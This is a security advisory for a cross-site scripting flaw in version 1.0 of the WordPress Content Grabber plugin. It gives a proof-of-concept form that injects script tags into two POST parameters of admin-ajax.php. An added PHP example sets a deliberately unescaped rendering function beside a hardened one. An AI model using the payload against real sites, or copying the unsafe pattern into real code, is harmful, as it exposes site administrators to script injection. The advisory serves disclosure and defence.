WordPress Content Grabber plugin version 1.0 suffers from a cross-site scripting vulnerability.
Title: WordPress 'Content Grabber' Plugin
Version: 1.0
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-14
Download:
- https://wordpress.org/plugins/content-grabber/
- https://plugins.svn.wordpress.org/content-grabber/
Notified WordPress: 2015-06-21
==========================================================
## Plugin description
==========================================================
A plugin to help you grab content of any post type and display them as you want
## Vulnerabilities
==========================================================
Two POST parameters (obj_field_name and obj_field_id) are printed unsanitized when the 'get_terms_taxonomies' action is executed.
PoC:
Log in as admin and submit the following request:
<form method="POST" action="[URL]/wp-admin/admin-ajax.php">
<input type="text" name="action" value="get_terms_taxonomies"><br />
<input type="text" name="post_type" value="post" ><br />
<input type="text" name="obj_field_name" value="widget-cg_content_grabber[3][cat_id]&quot;><script>alert(1)</script>" ><br />
<input type="text" name="obj_field_id" value="widget-cg_content_grabber-3-cat_id&quot;><script>alert(2)</script>" ><br />
<input type="text" name="cat_id_array" value="[&quot;1&quot;]" ><br />
<input type="submit">
</form>
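The pattern behind this finding and one way to close it, as an added example that is not the plugin's code or the advisory authors'. The <select> markup, the function names and the 128-character limit are assumptions; the sample values are the ones from the PoC form above.

```php
<?php
// Added illustration, not the Content Grabber source (the page does not show it).
// Assumption: the handler prints both POST fields into attributes of a <select>.

// Vulnerable shape: request values concatenated into attribute context as-is.
function render_select_unsafe(array $post): string {
    return '<select name="' . $post['obj_field_name']
         . '" id="' . $post['obj_field_id'] . '"></select>';
}

// Allowlist check. The character set is taken from the benign values in the PoC;
// the 128-character limit is an arbitrary assumption.
function is_valid_field_ref($value): bool {
    return is_string($value) && preg_match('/\A[\w\-\[\]]{1,128}\z/', $value) === 1;
}

// Escape for HTML attribute context. Inside WordPress, esc_attr() does this job.
function attr(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened shape: reject unexpected input, and escape on output regardless.
// A real admin-ajax handler would first call check_ajax_referer() and
// current_user_can() so that a cross-site form post is refused.
function render_select_safe(array $post): string {
    $name = $post['obj_field_name'] ?? null;
    $id   = $post['obj_field_id'] ?? null;
    if (!is_valid_field_ref($name) || !is_valid_field_ref($id)) {
        return 'invalid field reference';
    }
    return '<select name="' . attr($name) . '" id="' . attr($id) . '"></select>';
}

// Constructed sample input: the two values from the PoC form, then a benign pair.
$poc = [
    'obj_field_name' => 'widget-cg_content_grabber[3][cat_id]"><script>alert(1)</script>',
    'obj_field_id'   => 'widget-cg_content_grabber-3-cat_id"><script>alert(2)</script>',
];
$benign = [
    'obj_field_name' => 'widget-cg_content_grabber[3][cat_id]',
    'obj_field_id'   => 'widget-cg_content_grabber-3-cat_id',
];

echo "unsafe, PoC input:   ", render_select_unsafe($poc), "\n";
echo "escaped only:        ", attr($poc['obj_field_name']), "\n";
echo "hardened, PoC input: ", render_select_safe($poc), "\n";
echo "hardened, benign:    ", render_select_safe($benign), "\n";
```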
## Solution
==========================================================
No fix available
==========================================================
Vulnerabilities found using Eir, an early-stage static vulnerability scanner for PHP applications.